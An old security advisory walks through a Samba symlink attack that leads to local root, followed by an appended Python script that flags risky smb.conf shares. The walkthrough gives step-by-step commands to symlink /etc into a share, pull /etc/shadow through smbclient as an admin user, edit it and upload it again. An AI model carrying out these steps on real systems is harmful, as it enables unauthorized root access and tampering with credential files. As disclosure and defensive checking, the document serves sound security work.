[ SOURCE: http://www.secureroot.com/security/advisories/9768336198.html ]

Symlink attack in (all?) Samba. - Local root walkthrough by Tozz
=================================================================

Requirements:

 * Shell access or any other way to create symlinks
 * A running samba daemon
 * The username and/or password of a user named in the admin lists in one or more shares.
 * Brains are not required.

By default, Samba (http://www.samba.org) follows symlinks, which can lead to a root compromise. Here is an example:

I have a guy that sorts out all my uploads through SMB, he has 'admin' access (admin users = username). This means he will work as UID 0 (root). E.g. we have this share in /etc/smb.conf:

  [uploads]
  path = /home/ftp/incoming
  comment = Uploads that came through anon ftp
  guest ok = no
  writeable = no
  force create mode = 0755
  force directory mode = 0755
  admin users = warezmaster

Login to the shell, or find some other way to create symlinks, and create a symlink in /home/ftp/incoming. You do something like:

  ln /etc -s

Now type on your box (local or remote both work):

  smbclient file://foobar.com/uploads -U warezmaster

It will ask for a password, enter it and you will get something like:

  smb: \>

There we go:

  smb: \> cd etc
  smb: \> get shadow
  smb: \> exit
  [root@embrace /root]

Now you downloaded the shadow file to your local box. Edit it, change your UID to 0, or remove the password from the root account (no password required at logon). Login with smbclient again:

  smbclient file://foobar.com/uploads -U warezmaster

Enter the password and reupload:

  smb: \> cd etc
  smb: \> put shadow
  smb: \> exit

That's it. Now login to the shell; if you changed your own UID you are now root. If you removed the password from the root account, just su to it and you won't need a password.

Note: 'Follow Symlinks' can be turned off, but it's on by default.

Fix: Disable Follow Symlinks

Bye, Tozz (tozz@hackers4hackers.org)
You can contact me on AxeNet (irc.axenet.org, channel #axenet), nickname: Tozz, or MemoServ me when I'm not online.
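A defender-side check for the condition the advisory describes, added here as an example and not part of Tozz's advisory: it parses an smb.conf (a constructed fragment built around the [uploads] share above, on a hypothetical host) and flags every share that names `admin users` while `follow symlinks` is still at its default of yes, inheriting a [global] value where one is set.

```python
import configparser
import re

# Constructed smb.conf fragment (hypothetical host): the advisory's [uploads]
# share as written, plus a copy of it with the advisory's fix applied.
SMB_CONF = """[global]
    workgroup = EXAMPLE
[uploads]
    path = /home/ftp/incoming
    comment = Uploads that came through anon ftp
    guest ok = no
    writeable = no
    force create mode = 0755
    force directory mode = 0755
    admin users = warezmaster
[uploads-fixed]
    path = /home/ftp/incoming
    admin users = warezmaster
    follow symlinks = no
"""

def _norm(name: str) -> str:
    # Samba matches parameter names case-insensitively; collapse spacing too.
    return re.sub(r"\s+", " ", name.strip().lower())

def _is_yes(value: str) -> bool:
    # Samba boolean spellings for "on".
    return value.strip().lower() in ("yes", "true", "1")

def load_shares(text: str) -> dict:
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = _norm
    cp.read_string(text)
    return {s: dict(cp[s]) for s in cp.sections()}

def find_symlink_root_risks(text: str) -> list:
    """Names of shares where 'admin users' is set (those clients act as UID 0)
    and symlinks are still followed. 'follow symlinks' defaults to yes, so a
    share that never mentions it counts as exposed."""
    shares = load_shares(text)
    global_opts = shares.get("global", {})
    risky = []
    for name, opts in shares.items():
        if name == "global" or not opts.get("admin users", "").strip():
            continue
        follow = opts.get("follow symlinks",
                          global_opts.get("follow symlinks", "yes"))
        if _is_yes(follow):
            risky.append(name)
    return risky
```

Samba also has a separate `wide links` parameter governing symlinks that point outside a share's path; this check looks only at the `follow symlinks` setting the advisory tells you to turn off.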